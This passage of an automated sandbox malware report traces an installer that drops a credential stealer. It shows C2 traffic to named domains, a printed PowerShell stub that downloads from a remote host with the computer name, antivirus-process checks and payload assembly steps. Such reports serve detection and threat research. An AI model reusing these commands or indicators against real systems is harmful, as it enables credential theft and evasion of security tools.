cfL4;desc="?proto=TCP&rtt=1741&min_rtt=1729&rtt_var=673&sent=6&recv=8&lost=0&retrans=0&sent_bytes=3052&recv_bytes=2247&delivery_rate=2393442&cwnd=193&unsent_bytes=0&cid=2031a05a8f4b01de&ts=484&x=0"
2025-01-12 14:29:24 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-12 14:29:24 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49772	104.21.16.1	443	7696	C:\Users\user\AppData\Local\Temp\224553\Luther.com

Timestamp	Bytes transferred	Direction	Data
2025-01-12 14:29:24 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=AQP4E5FX5O04 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1081 Host: goldyhanders.cyou
2025-01-12 14:29:24 UTC	1081	OUT	Data Raw: 2d 2d 41 51 50 34 45 35 46 58 35 4f 30 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 33 38 33 34 41 33 46 33 35 45 43 41 44 37 32 43 43 32 39 39 44 30 35 44 36 42 46 41 43 45 44 0d 0a 2d 2d 41 51 50 34 45 35 46 58 35 4f 30 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 41 51 50 34 45 35 46 58 35 4f 30 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 70 73 79 63 68 65 0d 0a 2d 2d 41 51 50 34 45 35 46 58 35 4f 30 34 0d Data Ascii: --AQP4E5FX5O04Content-Disposition: form-data; name="hwid"C3834A3F35ECAD72CC299D05D6BFACED--AQP4E5FX5O04Content-Disposition: form-data; name="pid"1--AQP4E5FX5O04Content-Disposition: form-data; name="lid"jMw1IE--psyche--AQP4E5FX5O04
2025-01-12 14:29:25 UTC	1136	IN	HTTP/1.1 200 OK Date: Sun, 12 Jan 2025 14:29:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=09tm5baacr1d11tnq7ve852sm3; expires=Thu, 08 May 2025 08:16:04 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HgeZZjVvr2gC2W438j21AsjbQg22%2ByQ2T6UzdJIkSdc9cNTd5XE856Sm%2F0orhRY%2FsIJ%2BS2SrO2pOM700kls00omeh1Aaf0QysaKs17WKCOvSDH4epporF%2BsZufwb87cczc1%2BcQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 900dd6aeaf7641ba-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1724&min_rtt=1715&rtt_var=661&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3054&recv_bytes=1993&delivery_rate=2451035&cwnd=193&unsent_bytes=0&cid=1e0f440946f66b06&ts=511&x=0"
2025-01-12 14:29:25 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-12 14:29:25 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49777	104.21.16.1	443	7696	C:\Users\user\AppData\Local\Temp\224553\Luther.com

Timestamp	Bytes transferred	Direction	Data
2025-01-12 14:29:25 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 115 Host: goldyhanders.cyou
2025-01-12 14:29:25 UTC	115	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 6a 4d 77 31 49 45 2d 2d 70 73 79 63 68 65 26 6a 3d 61 61 37 37 65 37 38 62 36 62 30 64 64 31 62 32 32 32 36 65 37 62 37 39 39 35 33 32 61 62 33 61 26 68 77 69 64 3d 43 33 38 33 34 41 33 46 33 35 45 43 41 44 37 32 43 43 32 39 39 44 30 35 44 36 42 46 41 43 45 44 Data Ascii: act=get_message&ver=4.0&lid=jMw1IE--psyche&j=aa77e78b6b0dd1b2226e7b799532ab3a&hwid=C3834A3F35ECAD72CC299D05D6BFACED
2025-01-12 14:29:26 UTC	1132	IN	HTTP/1.1 200 OK Date: Sun, 12 Jan 2025 14:29:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=0gvn8p7m1dc1109f30570rc51r; expires=Thu, 08 May 2025 08:16:05 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Tn6rYXjawXUW8u4VxXuIZ%2F5UxFMVSI7Dhznee8c6c8Wu%2FoPivBVVnnv1aNfPe5xrQMPANRftW5FBLBd5XFwfXJZV5QQsv7vdzYc4sLJA%2BXGVpWsfQP5%2BbhDy6hy3QCNlbBUeZg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 900dd6b4f9930fa8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1456&min_rtt=1442&rtt_var=568&sent=5&recv=6&lost=0&retrans=0&sent_bytes=3054&recv_bytes=1017&delivery_rate=2818532&cwnd=253&unsent_bytes=0&cid=9c7de9eaca25de9e&ts=494&x=0"
2025-01-12 14:29:26 UTC	218	IN	Data Raw: 64 34 0d 0a 32 39 66 59 45 59 46 57 4f 6e 51 69 6b 43 73 53 5a 55 63 46 69 4b 78 6a 4b 62 38 39 37 64 4e 46 30 63 46 4c 68 53 6b 66 72 34 53 41 72 50 70 6b 6f 32 77 59 48 46 62 6b 57 32 46 66 47 79 72 55 67 77 42 4d 32 45 6a 44 6f 43 32 2b 73 52 65 71 45 53 71 59 73 4f 6e 68 36 69 57 31 59 47 5a 62 55 76 67 46 5a 68 30 7a 4a 36 53 4f 42 56 32 64 42 39 2f 2f 5a 37 54 6a 63 62 52 55 4d 39 53 6d 72 76 58 69 4d 2b 6b 69 54 67 52 52 71 6e 63 39 4f 57 68 75 35 4d 55 54 54 74 42 54 6d 4c 74 72 6f 71 6b 6b 39 58 55 77 78 75 71 76 69 4c 74 39 38 51 6c 4a 48 45 4f 2b 58 32 6f 52 5a 53 6d 71 79 68 63 4c 68 51 33 42 38 53 44 7a 2b 33 76 34 64 41 3d 3d 0d 0a Data Ascii: d429fYEYFWOnQikCsSZUcFiKxjKb897dNF0cFLhSkfr4SArPpko2wYHFbkW2FfGyrUgwBM2EjDoC2+sReqESqYsOnh6iW1YGZbUvgFZh0zJ6SOBV2dB9//Z7TjcbRUM9SmrvXiM+kiTgRRqnc9OWhu5MUTTtBTmLtroqkk9XUwxuqviLt98QlJHEO+X2oRZSmqyhcLhQ3B8SDz+3v4dA==
2025-01-12 14:29:26 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49782	185.161.251.21	443	7696	C:\Users\user\AppData\Local\Temp\224553\Luther.com

Timestamp	Bytes transferred	Direction	Data
2025-01-12 14:29:27 UTC	201	OUT	GET /8574262446/ph.txt HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: cegu.shop
2025-01-12 14:29:27 UTC	249	IN	HTTP/1.1 200 OK Server: nginx/1.26.2 Date: Sun, 12 Jan 2025 14:29:27 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 329 Last-Modified: Thu, 26 Dec 2024 00:07:06 GMT Connection: close ETag: "676c9e2a-149" Accept-Ranges: bytes
2025-01-12 14:29:27 UTC	329	IN	Data Raw: 5b 4e 65 74 2e 73 65 72 76 69 63 65 70 4f 49 4e 54 6d 41 4e 61 47 65 72 5d 3a 3a 53 45 63 55 52 69 54 79 50 72 4f 74 6f 43 4f 6c 20 3d 20 5b 4e 65 74 2e 53 65 63 55 72 69 54 79 70 72 4f 74 6f 63 6f 6c 74 59 50 65 5d 3a 3a 74 4c 73 31 32 3b 20 24 67 44 3d 27 68 74 74 70 73 3a 2f 2f 64 66 67 68 2e 6f 6e 6c 69 6e 65 2f 69 6e 76 6f 6b 65 72 2e 70 68 70 3f 63 6f 6d 70 4e 61 6d 65 3d 27 2b 24 65 6e 76 3a 63 6f 6d 70 75 74 65 72 6e 61 6d 65 3b 20 24 70 54 53 72 20 3d 20 69 57 72 20 2d 75 52 69 20 24 67 44 20 2d 75 53 65 62 41 53 49 63 70 41 52 73 69 4e 67 20 2d 55 73 45 72 41 47 65 6e 74 20 27 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 37 2e Data Ascii: [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.

Target ID:	0
Start time:	09:28:55
Start date:	12/01/2025
Path:	C:\Users\user\Desktop\installer_1.05_37.4.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\installer_1.05_37.4.exe"
Imagebase:	0x400000
File size:	1'120'175 bytes
MD5 hash:	A2E9824E77BE1FBC29913FFD0B324823
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	09:28:56
Start date:	12/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c move Unexpected Unexpected.cmd & Unexpected.cmd
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	09:28:56
Start date:	12/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	09:28:58
Start date:	12/01/2025
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0x5a0000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	09:28:58
Start date:	12/01/2025
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "opssvc wrsa"
Imagebase:	0x830000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	09:28:58
Start date:	12/01/2025
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0x5a0000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	09:28:58
Start date:	12/01/2025
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Imagebase:	0x830000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	09:28:59
Start date:	12/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c md 224553
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	09:28:59
Start date:	12/01/2025
Path:	C:\Windows\SysWOW64\extrac32.exe
Wow64 process (32bit):	true
Commandline:	extrac32 /Y /E Choosing
Imagebase:	0x320000
File size:	29'184 bytes
MD5 hash:	9472AAB6390E4F1431BAA912FCFF9707
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	09:28:59
Start date:	12/01/2025
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /V "Readily" Departure
Imagebase:	0x830000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	09:28:59
Start date:	12/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c copy /b 224553\Luther.com + Remote + Priorities + Cho + Reliability + Rating + Dot + Holocaust + Page + Webshots 224553\Luther.com
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	09:28:59
Start date:	12/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c copy /b ..\Crowd + ..\Leone + ..\Tutorial + ..\Architect + ..\Mutual + ..\Margin + ..\Many z
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	09:28:59
Start date:	12/01/2025
Path:	C:\Users\user\AppData\Local\Temp\224553\Luther.com
Wow64 process (32bit):	true
Commandline:	Luther.com z
Imagebase:	0xe30000
File size:	947'288 bytes
MD5 hash:	62D09F076E6E0240548C2F837536A46A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.4497541378.0000000003919000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000003.2260491434.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000003.2271590725.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000003.2260009291.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000003.2259044723.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000003.2247382365.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000003.2288364664.0000000003919000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000003.2285485834.0000000003919000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000003.2271884207.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000003.2247660690.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000003.2246305731.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	14
Start time:	09:28:59
Start date:	12/01/2025
Path:	C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit):	true
Commandline:	choice /d y /t 5
Imagebase:	0xad0000
File size:	28'160 bytes
MD5 hash:	FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	17.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	20.7%
Total number of Nodes:	1526
Total number of Limit Nodes:	33

Executed Functions

Function 004050CD Relevance: 68.5, APIs: 36, Strings: 3, Instructions: 295
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 0040512F
GetDlgItem.USER32(?,000003EE), ref: 0040513E
GetClientRect.USER32(?,?), ref: 00405196
GetSystemMetrics.USER32(00000015), ref: 0040519E
SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
ShowWindow.USER32(?,00000008), ref: 0040523A
GetDlgItem.USER32(?,000003EC), ref: 0040525B
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
GetDlgItem.USER32(?,000003F8), ref: 0040514D

Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6

Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

GetDlgItem.USER32(?,000003EC), ref: 004052AB
CreateThread.KERNELBASE(00000000,00000000,Function_00005047,00000000), ref: 004052B9
CloseHandle.KERNELBASE(00000000), ref: 004052C0
ShowWindow.USER32(00000000), ref: 004052E7
ShowWindow.USER32(?,00000008), ref: 004052EC
ShowWindow.USER32(00000008), ref: 00405333
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
CreatePopupMenu.USER32 ref: 00405376
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
GetWindowRect.USER32(?,?), ref: 0040539E
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
OpenClipboard.USER32(00000000), ref: 0040540B
EmptyClipboard.USER32 ref: 00405411
GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
GlobalLock.KERNEL32(00000000), ref: 00405427
SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
GlobalUnlock.KERNEL32(00000000), ref: 0040545D
SetClipboardData.USER32(0000000D,00000000), ref: 00405468
CloseClipboard.USER32 ref: 0040546E

Strings

@rD, xrefs: 004053D7
{, xrefs: 00405352
New install of "%s" to "%s", xrefs: 00405182

Memory Dump Source

Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
String ID: @rD$New install of "%s" to "%s"${
API String ID: 2110491804-2409696222
Opcode ID: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
Opcode Fuzzy Hash: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59

Function 00403883 Relevance: 54.6, APIs: 22, Strings: 9, Instructions: 304
filestringcomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#17.COMCTL32 ref: 004038A2
SetErrorMode.KERNELBASE(00008001), ref: 004038AD
OleInitialize.OLE32(00000000), ref: 004038B4

Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327

SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
CoUninitialize.COMBASE(?), ref: 00403AD1
ExitProcess.KERNEL32 ref: 00403AF1
lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40

Strings

NCRC, xrefs: 0040397C
1C, xrefs: 00403B56
_?=, xrefs: 00403A64
~nsu.tmp, xrefs: 00403AF7
/D=, xrefs: 004039A6
Error launching installer, xrefs: 00403A7D
\Temp, xrefs: 00403A1B
SeShutdownPrivilege, xrefs: 00403C16
NSIS Error, xrefs: 004038E2

Memory Dump Source

Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
API String ID: 2435955865-239407132
Opcode ID: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
Opcode Fuzzy Hash: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E

Function 004074BB Relevance: 5.4, APIs: 4, Instructions: 382
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
